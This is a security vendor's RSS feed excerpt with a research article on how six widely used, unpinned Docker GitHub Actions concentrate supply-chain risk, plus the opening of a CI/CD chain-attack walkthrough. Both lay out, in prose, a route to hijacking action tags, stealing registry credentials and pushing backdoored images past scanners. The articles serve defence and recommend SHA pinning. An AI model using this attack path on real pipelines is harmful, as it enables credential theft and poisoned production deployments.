&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Fai-agents-cicd-supply-chain-force-multipliers&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 17:56:14 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers</guid>
      <dc:date>2026-03-24T17:56:14Z</dc:date>
    </item>
    <item>
      <title>The Docker Chokepoint — One Org, Six Actions, Thousands of Pipelines</title>
      <link>https://vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/08-docker-pipeline-flow.png" alt="The Docker Chokepoint — One Org, Six Actions, Thousands of Pipelines" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
   Chris Nyhuis 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
   CEO, Vigilant 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
   10 min read 
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  10 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;The most critical concentration risk in GitHub’s CI/CD ecosystem isn’t a single action - it’s a single organization. Docker controls six of the most commonly unpinned actions in the dataset, running inside the container build pipelines of thousands of the most popular open-source projects.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;When we mapped the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain crisis&lt;/a&gt; across GitHub’s top 50K repos, Docker’s official GitHub Actions stood out as a category of their own. Not because Docker actions are poorly built - they’re among the most professionally maintained in the ecosystem. The problem is concentration. One organization’s actions dominate the top of the unpinned actions list, creating a single point of failure that spans thousands of the most critical open-source projects.&lt;/p&gt; 
&lt;p&gt;This is a different kind of risk from the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;single-maintainer problem&lt;/a&gt;. Docker is a company with engineering teams and security practices. But organizational compromise is still possible - and the blast radius of a Docker GitHub org compromise would be unmatched in the CI/CD supply chain.&lt;/p&gt; 
&lt;h2&gt;The Numbers&lt;/h2&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Docker Action&lt;/th&gt; 
   &lt;th&gt;Repos&lt;/th&gt; 
   &lt;th&gt;Findings&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/login-action@v3&lt;/td&gt; 
   &lt;td&gt;1,848&lt;/td&gt; 
   &lt;td&gt;5,099&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/setup-buildx-action@v3&lt;/td&gt; 
   &lt;td&gt;1,845&lt;/td&gt; 
   &lt;td&gt;4,258&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/setup-qemu-action@v3&lt;/td&gt; 
   &lt;td&gt;1,181&lt;/td&gt; 
   &lt;td&gt;2,038&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/build-push-action@v6&lt;/td&gt; 
   &lt;td&gt;1,090&lt;/td&gt; 
   &lt;td&gt;2,665&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/metadata-action@v5&lt;/td&gt; 
   &lt;td&gt;900&lt;/td&gt; 
   &lt;td&gt;1,734&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker/login-action@v2&lt;/td&gt; 
   &lt;td&gt;504&lt;/td&gt; 
   &lt;td&gt;1,247&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;Docker’s total footprint: approximately 2,740+ unique repos affected across 130+ unique action references. These actions appear in more top repos than any other set of actions by any single maintainer or organization.&lt;/p&gt; 
&lt;p&gt;docker/login-action and docker/setup-buildx-action are nearly identical in adoption - 1,848 and 1,845 repos respectively. This makes sense: any repo building Docker containers needs both. They travel as a pair, which means a compromise of either action’s tag would likely hit the same 1,848 pipelines.&lt;/p&gt; 
&lt;p&gt;The pairing pattern extends across Docker’s action suite. A typical container build workflow uses three to five Docker actions in sequence: setup-qemu for multi-platform support, setup-buildx for the builder, login for registry authentication, metadata for image tagging, and build-push for the actual build and push. Each action is a link in the chain. Each link uses a mutable tag. The attack surface isn’t one action - it’s the entire pipeline orchestration layer that Docker provides.&lt;/p&gt; 
&lt;p&gt;What this means in practice: when we say 2,740+ unique repos are affected by Docker’s unpinned actions, that’s counting each repo once. Most of those repos use three to five Docker actions simultaneously, each unpinned. The finding count per repo is multiplicative - 1,848 repos with docker/login-action findings likely have 3-5 additional Docker action findings each.&lt;/p&gt; 
&lt;h2&gt;Why Docker Actions Are the Chokepoint&lt;/h2&gt; 
&lt;p&gt;Docker actions don’t just run arbitrary CI steps. They have privileged access by design.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;docker/login-action&lt;/strong&gt; authenticates with container registries - Docker Hub, AWS ECR, Google Container Registry, Azure Container Registry, GitHub Container Registry. During execution, this action holds your registry credentials in memory. A compromised version could exfiltrate those credentials and use them to push malicious container images to your registries.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;docker/build-push-action&lt;/strong&gt; builds container images and pushes them to registries. It has access to the build context (your application source code), the Dockerfile, and the push credentials. A compromised version could inject malicious layers into your container image - a backdoor in the base image, a modified entrypoint, an additional network call that phones home.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;docker/setup-buildx-action&lt;/strong&gt; configures the Docker BuildKit builder. It runs before the build step, setting up the environment that will process your Dockerfile. A compromised version could configure the build environment to intercept secrets, modify build output, or install persistent tooling on self-hosted runners.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;docker/metadata-action&lt;/strong&gt; generates tags and labels for container images. It determines what your images are tagged as - &lt;code&gt;latest&lt;/code&gt;, version numbers, commit SHAs. A compromised version could manipulate image tags to cause deployments to pull the wrong image version.&lt;/p&gt; 
&lt;p&gt;The combination is the threat. These actions form a pipeline: authenticate → configure → build → push. Compromise any link and the attacker has access to everything that flows through it.&lt;/p&gt; 
&lt;h2&gt;The Docker Pipeline Attack Scenario&lt;/h2&gt; 
&lt;p&gt;Here’s how a Docker-focused &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;chain attack&lt;/a&gt; would work:&lt;/p&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/08-docker-pipeline-flow.png" alt="Docker Pipeline Flow - One Org, Six Actions, Thousands of Pipelines" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Compromise docker/login-action.&lt;/strong&gt; An attacker with push access moves the &lt;code&gt;@v3&lt;/code&gt; tag to a malicious commit. The modified action captures registry credentials during authentication and exfiltrates them.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Silent propagation.&lt;/strong&gt; On the next CI trigger in any of the 1,848 consuming repos, the compromised login action executes. Registry credentials for Docker Hub, AWS ECR, GCR, GHCR - whatever that repo authenticates against - are stolen.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Image poisoning.&lt;/strong&gt; With stolen registry credentials, the attacker pushes backdoored container images to the repo’s container registry. The images use the same tags (including &lt;code&gt;latest&lt;/code&gt;) as the legitimate ones.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Deployment propagation.&lt;/strong&gt; Every system pulling that container image - Kubernetes clusters, cloud deployments, local development environments - now runs the attacker’s code. The blast radius extends from CI/CD into production.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;This is a supply chain attack that jumps domains - from the CI/CD pipeline supply chain into the container image supply chain, and from there into production infrastructure. The Docker chokepoint is the bridge between these two supply chains.&lt;/p&gt; 
&lt;p&gt;What makes this scenario particularly dangerous is the detection gap. Traditional container scanning tools (Trivy, Snyk Container, Anchore) scan the resulting image for known CVEs in installed packages. They don’t detect a malicious layer injected during the build process - because the injected code isn’t a known vulnerability. It’s novel malware placed by the build tool itself. The container scanner sees a clean base image with expected packages. The backdoor lives in a layer that the scanner doesn’t flag because it was added by the “trusted” build process.&lt;/p&gt; 
&lt;p&gt;Similarly, CI/CD logs would look normal. The workflow file hasn’t changed. The action reference still says &lt;code&gt;@v3&lt;/code&gt;. The build output still produces an image. Everything appears to work exactly as expected - because the compromise is upstream in the action code, not in the workflow configuration.&lt;/p&gt; 
&lt;p&gt;In my red team experience, these cross-domain attacks - where the compromise crosses from one supply chain into another - are the hardest to detect and the most impactful. The defenders looking at CI/CD don’t see the container issue. The defenders looking at containers don’t see the CI/CD issue. The attack lives in the gap between teams.&lt;/p&gt; 
&lt;h2&gt;Version Sprawl in Docker Actions&lt;/h2&gt; 
&lt;p&gt;Docker actions don’t just have one mutable tag - they have 28.&lt;/p&gt; 
&lt;p&gt;docker/build-push-action has been referenced across 28 unique mutable refs in our dataset:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Version Range&lt;/th&gt; 
   &lt;th&gt;Notable Versions&lt;/th&gt; 
   &lt;th&gt;Status&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;v1-v3&lt;/td&gt; 
   &lt;td&gt;@v1, @v2, @v3&lt;/td&gt; 
   &lt;td&gt;End-of-life - still in active use&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;v4-v5&lt;/td&gt; 
   &lt;td&gt;@v4 (128 repos), @v5 (291 repos)&lt;/td&gt; 
   &lt;td&gt;Previous majors - widely used&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;v6&lt;/td&gt; 
   &lt;td&gt;@v6 (610 repos)&lt;/td&gt; 
   &lt;td&gt;Current - most common&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Patch&lt;/td&gt; 
   &lt;td&gt;@v6.19.2, @v5.x.x&lt;/td&gt; 
   &lt;td&gt;Specific patches - still mutable&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Branch&lt;/td&gt; 
   &lt;td&gt;@master (3 repos)&lt;/td&gt; 
   &lt;td&gt;Worst case - tracks every commit&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;85+ repos still use v1 through v3 of Docker actions - end-of-life versions that are no longer maintained but still resolve to code when referenced. An attacker who compromises an EOL tag faces even less scrutiny because nobody is watching those old versions.&lt;/p&gt; 
&lt;p&gt;The 3 repos pinned to &lt;code&gt;@master&lt;/code&gt; are the most exposed - every commit to Docker’s action repos executes immediately in those pipelines. But even &lt;code&gt;@v6.19.2&lt;/code&gt;, which looks specific, is a mutable Git tag. It can be moved just as easily as &lt;code&gt;@v3&lt;/code&gt;.&lt;/p&gt; 
&lt;h2&gt;The Downstream Impact&lt;/h2&gt; 
&lt;p&gt;The repos using Docker actions unpinned aren’t hobby projects. They’re the infrastructure of the software industry.&lt;/p&gt; 
&lt;p&gt;Cross-referencing our Docker action findings with the broader dataset, the repos that depend on Docker’s unpinned actions include major cloud provider repos, OSS foundation projects, AI/ML frameworks, distributed databases, and developer tools used by millions. When we say 1,848 repos use docker/login-action@v3, those repos have a combined downstream fork count in the tens of millions.&lt;/p&gt; 
&lt;p&gt;The concentration creates a cascade effect specific to Docker’s position in the ecosystem. Docker actions are uniquely positioned at the intersection of two supply chains: the CI/CD pipeline supply chain (GitHub Actions) and the container image supply chain (Docker Hub, registries). A compromise at this intersection doesn’t just affect CI - it poisons the container images that flow into production deployments worldwide.&lt;/p&gt; 
&lt;p&gt;Consider the downstream path: a compromised docker/build-push-action injects a malicious layer into a container image during the build. That image gets pushed to a registry. Kubernetes clusters, cloud deployments, and development environments pull the image. The malicious layer executes in every context that runs the container. The CI/CD compromise has crossed the boundary into runtime - and the repos that built those images have no idea, because their workflow files haven’t changed.&lt;/p&gt; 
&lt;p&gt;This is what makes the Docker chokepoint different from other concentration risks. It’s not just about code running in CI - it’s about code flowing into every deployment that consumes the build output.&lt;/p&gt; 
&lt;h2&gt;Who Depends on Docker Actions&lt;/h2&gt; 
&lt;p&gt;The language communities most exposed to the Docker chokepoint map predictably to container-heavy ecosystems:&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;Go&lt;/strong&gt; repos heavily use Docker actions for multi-platform binary builds and container packaging&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Rust&lt;/strong&gt; repos pair Docker actions with dtolnay/rust-toolchain for cross-compilation into container images&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;TypeScript/Node&lt;/strong&gt; repos use Docker for production container builds alongside npm-based CI&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;The overlap with the &lt;a href="https://www.vigilantdefense.com/research/language-risk-matrix-rust-repos-cicd-security"&gt;language risk matrix&lt;/a&gt; data is notable: the languages with the highest CI/CD vulnerability rates (Rust at 77.9%, TypeScript at 61.7%, Go at 53.8%) are also among the heaviest Docker action consumers. Complex build toolchains drive both higher Docker action adoption and higher overall vulnerability rates.&lt;/p&gt; 
&lt;h2&gt;The Single-Maintainer Contrast&lt;/h2&gt; 
&lt;p&gt;Docker is an organization - which makes its concentration risk different from the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;single-maintainer problem&lt;/a&gt;. The risk profile is lower on the credential compromise axis (corporate accounts have MFA, SSO, audit logs) but higher on the blast radius axis (one org, six actions, 2,740+ repos).&lt;/p&gt; 
&lt;p&gt;The comparison:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Maintainer&lt;/th&gt; 
   &lt;th&gt;Type&lt;/th&gt; 
   &lt;th&gt;Repos&lt;/th&gt; 
   &lt;th&gt;Actions&lt;/th&gt; 
   &lt;th&gt;Compromise Vector&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;docker&lt;/td&gt; 
   &lt;td&gt;Organization&lt;/td&gt; 
   &lt;td&gt;2,740+&lt;/td&gt; 
   &lt;td&gt;6&lt;/td&gt; 
   &lt;td&gt;Org compromise, insider, CI/CD of the action itself&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;action-gh-release&lt;/td&gt; 
   &lt;td&gt;Individual&lt;/td&gt; 
   &lt;td&gt;1,405&lt;/td&gt; 
   &lt;td&gt;1&lt;/td&gt; 
   &lt;td&gt;Personal credential compromise&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;setup-php&lt;/td&gt; 
   &lt;td&gt;Individual&lt;/td&gt; 
   &lt;td&gt;1,147&lt;/td&gt; 
   &lt;td&gt;1&lt;/td&gt; 
   &lt;td&gt;Personal credential compromise&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;rust-toolchain&lt;/td&gt; 
   &lt;td&gt;Individual&lt;/td&gt; 
   &lt;td&gt;989&lt;/td&gt; 
   &lt;td&gt;1&lt;/td&gt; 
   &lt;td&gt;Personal credential compromise&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;Docker’s risk is concentration. &lt;code&gt;action-gh-release&lt;/code&gt;’s risk is fragility. Both are supply chain problems, but they require different mitigations. Docker actions should be SHA-pinned because of their blast radius. Single-maintainer actions should be SHA-pinned because of their fragility. In both cases, the fix is the same - but the urgency comes from different threat models.&lt;/p&gt; 
&lt;h2&gt;The Codecov Parallel&lt;/h2&gt; 
&lt;p&gt;The Docker chokepoint isn’t unprecedented - it mirrors the Codecov incident of April 2021. Codecov’s Bash Uploader script was modified by an attacker who gained access through a compromised Docker image in Codecov’s CI pipeline. The modified script exfiltrated environment variables - including CI secrets, tokens, and keys - from every repo running the uploader.&lt;/p&gt; 
&lt;p&gt;The parallel is instructive: Codecov was a single tool in widespread use across thousands of repos. The compromise was silent - the uploader still functioned correctly. The attack ran for over two months before detection. And the blast radius was massive, with companies like Twitch, HashiCorp, and others disclosing potential impact.&lt;/p&gt; 
&lt;p&gt;Docker’s actions occupy an even more central position than Codecov’s uploader did. codecov/codecov-action appears in 1,049 repos in our dataset across 35 version refs. Docker’s login-action alone is in 1,848 - nearly double - and Docker controls five additional actions in the same pipeline. The lesson from Codecov is that these concentration risks aren’t theoretical. They’ve been exploited before. The question is whether Docker’s chokepoint gets exploited before the ecosystem pins its way out of the blast radius.&lt;/p&gt; 
&lt;h2&gt;What SHA-Pinned Docker Actions Look Like&lt;/h2&gt; 
&lt;p&gt;The difference between vulnerable and secure Docker action usage:&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Before (mutable - vulnerable):&lt;/strong&gt;&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;- uses: docker/login-action@v3
- uses: docker/setup-buildx-action@v3
- uses: docker/build-push-action@v6
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;&lt;strong&gt;After (SHA-pinned - secure):&lt;/strong&gt;&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;- uses: docker/login-action@74a8a23... # v3.4.0
- uses: docker/setup-buildx-action@b5ca514... # v3.10.0
- uses: docker/build-push-action@14487ce... # v6.14.0
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;The SHA pin locks the reference to a specific commit. The version comment preserves readability. If Docker pushes a new version, your workflow keeps running the code you reviewed. You upgrade when you choose to, not when the tag moves.&lt;/p&gt; 
&lt;p&gt;Runner Guard’s autofix engine performs this transformation automatically - resolving every mutable Docker action reference to its current SHA with a version comment. The &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; covers the complete process.&lt;/p&gt; 
&lt;h2&gt;What You Can Do About It&lt;/h2&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;SHA-pin all Docker actions immediately.&lt;/strong&gt; docker/login-action, docker/setup-buildx-action, docker/build-push-action, docker/metadata-action, docker/setup-qemu-action. These are the highest-blast-radius actions in the ecosystem. Pin them first.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Configure Dependabot for Docker action updates.&lt;/strong&gt; SHA pins need maintenance - when Docker releases security patches, you need to update your pins. Dependabot automates this with PR-based updates.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Audit your Docker action versions.&lt;/strong&gt; If you’re using v1-v3 of any Docker action, you’re on an end-of-life version. Update to current and SHA-pin in a single step.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Consider Docker’s container signing.&lt;/strong&gt; Docker Content Trust and Sigstore provide image-level verification that complements action-level SHA pinning. Pin the action AND verify the image.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Monitor Docker’s GitHub organization.&lt;/strong&gt; If Docker’s org security posture changes - ownership changes, unusual access patterns, public incidents - that’s a signal to re-evaluate your dependency. &lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Continuous monitoring&lt;/a&gt; catches these signals automatically.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The Docker chokepoint illustrates why supply chain security can’t focus on individual actions in isolation. It’s the concentration pattern - one org controlling the build pipeline infrastructure for thousands of projects - that creates systemic risk. The fix is mechanical: SHA-pin, configure updates, monitor. The risk is structural: a single point of failure at the foundation of the container ecosystem.&lt;/p&gt; 
&lt;p&gt;The broader lesson extends beyond Docker. Any organization whose actions dominate a critical pipeline function - build, deploy, sign, publish - creates a chokepoint. Docker is the current example. As the ecosystem evolves, new chokepoints will emerge around whatever tooling developers converge on next. The defense isn’t just pinning Docker actions today - it’s building the muscle to identify and pin whatever becomes the next concentration risk tomorrow. That requires &lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;continuous monitoring&lt;/a&gt; of your CI/CD dependency landscape, not just periodic audits.&lt;/p&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;Anatomy of a CI/CD Chain Attack - From Recon to Exfiltration in 5 Steps&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It - SHA Pinning, Least Privilege, and the 5-Minute Security Upgrade&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;Scan your repos today.&lt;/strong&gt; &lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; is Vigilant’s free, open-source CI/CD security scanner - the same tool that powered this research. Install it in under a minute:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt; 
&lt;p&gt;14 security rules. Zero configuration. One command.&lt;/p&gt;   
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Fdocker-chokepoint-github-actions-supply-chain&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <pubDate>Tue, 24 Mar 2026 17:45:50 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain</guid>
      <dc:date>2026-03-24T17:45:50Z</dc:date>
    </item>
    <item>
      <title>Anatomy of a CI/CD Chain Attack — From Recon to Exfiltration</title>
      <link>https://vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/09-chain-attack-flow.png" alt="Anatomy of a CI/CD Chain Attack — From Recon to Exfiltration" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
   Chris Nyhuis 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
   CEO, Vigilant 
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
   12 min read 
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  12 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;A chained exploit isn’t one vulnerability - it’s a sequence of individually minor weaknesses that compound into a full compromise path. In CI/CD, the chain is entirely automated and scales horizontally.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;In our &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;scan of GitHub’s top 50K repos&lt;/a&gt;, we found 192,776 individual security findings. Individually, most of them are medium severity - a mutable version tag here, an overly broad permission there. But vulnerabilities don’t exist in isolation. Attackers don’t exploit one finding - they chain them.&lt;/p&gt; 
&lt;p&gt;6,983 repos in our dataset have compound vulnerabilities across two or more rule categories. 3,172 have the exact combination that constitutes a complete attack chain: an unpinned action plus write permissions. 611 have the triple compound - unpinned action, write permissions, and a dangerous trigger - the most dangerous repos in the dataset.&lt;/p&gt; 
&lt;p&gt;This article walks through the five steps of a CI/CD chain attack, mapping each step to real data from our scan. This isn’t theoretical. Every element of this chain exists in production right now, across thousands of repositories.&lt;/p&gt; 
&lt;p&gt;I’ve spent 30 years on both sides of this wire - building these attack chains in red team engagements against banks, government agencies, and critical infrastructure, and building the tools to detect them. The chain I’m about to describe isn’t hypothetical. It’s a playbook.&lt;/p&gt; 
&lt;h2&gt;What Is a Chained Exploit?&lt;/h2&gt; 
&lt;p&gt;In traditional security, a chained exploit links multiple weaknesses into a single attack path. A phishing email delivers a credential-harvesting page. The stolen credential grants VPN access. The VPN connection reaches an unpatched internal server. The server exploit escalates to domain admin. No single step is a critical vulnerability. Together, they’re a complete compromise.&lt;/p&gt; 
&lt;p&gt;CI/CD chain attacks follow the same logic but operate in a fundamentally different environment. The entire chain is public - workflow files are readable by anyone. The attack is automated - CI triggers execute without human interaction. And the scale is horizontal - one compromised action hits every consumer simultaneously, not one target at a time.&lt;/p&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/09-chain-attack-flow.png" alt="Chain Attack Flow - From Recon to Exfiltration in 5 Steps" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;h2&gt;Step 1: Reconnaissance&lt;/h2&gt; 
&lt;p&gt;The attacker’s first move is mapping the target landscape. In CI/CD, this is trivially easy - and our scan proves it.&lt;/p&gt; 
&lt;p&gt;GitHub Actions workflow files live in &lt;code&gt;.github/workflows/&lt;/code&gt; in every public repository. They’re readable without authentication. An attacker can enumerate every action dependency, every permission grant, every workflow trigger across the entire platform using GitHub’s Search API and Contents API.&lt;/p&gt; 
